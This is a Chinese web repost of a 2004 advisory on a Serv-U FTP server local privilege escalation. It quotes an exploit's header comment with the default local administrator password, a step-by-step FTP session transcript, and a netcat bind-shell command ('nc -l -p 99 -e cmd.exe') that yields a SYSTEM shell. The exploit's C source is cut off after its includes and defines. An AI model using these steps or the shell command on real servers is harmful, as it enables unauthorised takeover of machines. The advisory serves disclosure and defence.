Serv-U本地权限提升漏洞
2008-04-09 04:27:32来源:互联网 阅读 ()
发布日期:2004-08-06
更新日期:2004-08-09
受影响系统:
RhinoSoft Serv-U 5.1.0.0描述:
RhinoSoft Serv-U 5.0.0.9
RhinoSoft Serv-U 5.0.0.4
RhinoSoft Serv-U 5.0
RhinoSoft Serv-U 4.1.0.3
RhinoSoft Serv-U 4.1.0.11
RhinoSoft Serv-U 4.0.0.4
RhinoSoft Serv-U 4.0.0.0
RhinoSoft Serv-U 3.0.0.20
Serv-U是一个Windows平台下使用非常广泛的FTP服务器软件。
Serv-U存在设计问题,本地攻击者可以利用这个漏洞以SYSTEM权限在系统上执行任意命令。
所有Serv-U存在默认本地管理员登录密码,这帐户只能在本地接口中连接,因此本地攻击者可以连接Serv-U并建立拥有执行权限的FTP用户,在这个用户建立后,连接FTP服务器并执行"SITE EXEC"命令,程序就会以SYSTEM权限执行。
<*来源:aT4r ins4n3 (at4r@ciberdreams.com)
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m=109196729111556&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
* Hax0rcitos proudly presents
* Serv-u Local Exploit >v3.x. (tested also against last version 5.1.0.0)
*
* All Serv-u Versions have default Login/password for local Administration.
* This account is only available to connect in the loopback interface, so a
* local user will be able to connect to Serv-u with this account and create
* an ftp user with execute rights. after the user is created, just connect
* to the ftp server and execute a raw "SITE EXEC" command. the program will
* be execute with SYSTEM privileges.
*
* Copyright (c) 2003-2004 Haxorcitos.com . All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*
* Date: 10/2003
* Author: Andrés Tarascó Acunha
*
* Greetings to: #haxorcitos - #localhost and #!dsr blackxors =)
*
* Tested Against Serv-u 4.x and v5.1.0.0
G:\exploit\serv-U\local>whoami
INSANE\aT4r
G:\exploit\serv-U\local>servulocal.exe "nc -l -p 99 -e cmd.exe"
Serv-u >3.x Local Exploit by Haxorcitos
<220 Serv-U FTP Server v5.0 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[ ] Creating New Domain...
<200-DomainID=3
220 Domain settings saved
******************************************************
[ ] Domain Haxorcitos:3 Created
[ ] Setting New Domain Online
<220 Server command OK
******************************************************
[ ] Creating Evil User
<200-User=haxorcitos
200 User settings saved
******************************************************
[ ] Now Exploiting...
>USER haxorcitos
<331 User name okay, need password.
******************************************************
>PASS whitex0r
<230 User logged in, proceed.
******************************************************
[ ] Now Executing: nc -l -p 99 -e cmd.exe
<220 Domain deleted
******************************************************
G:\exploit\serv-U\local>nc localhost 99
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>whoami
whoami
NT AUTHORITY\SYSTEM
C:\>
*/
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <io.h>
#include <process.h>
//Responses
#define BANNER "220 "
#define USEROK "331 User name okay"
#define PASSOK "230 User logged in, proceed."
#define ADMOK "230-Switching to SYSTEM MAINTENANCE mode."
#define DOMAINID "200-DomainID="
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
- Serv-u本地权限提升漏洞的终极防御 2009-05-12
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
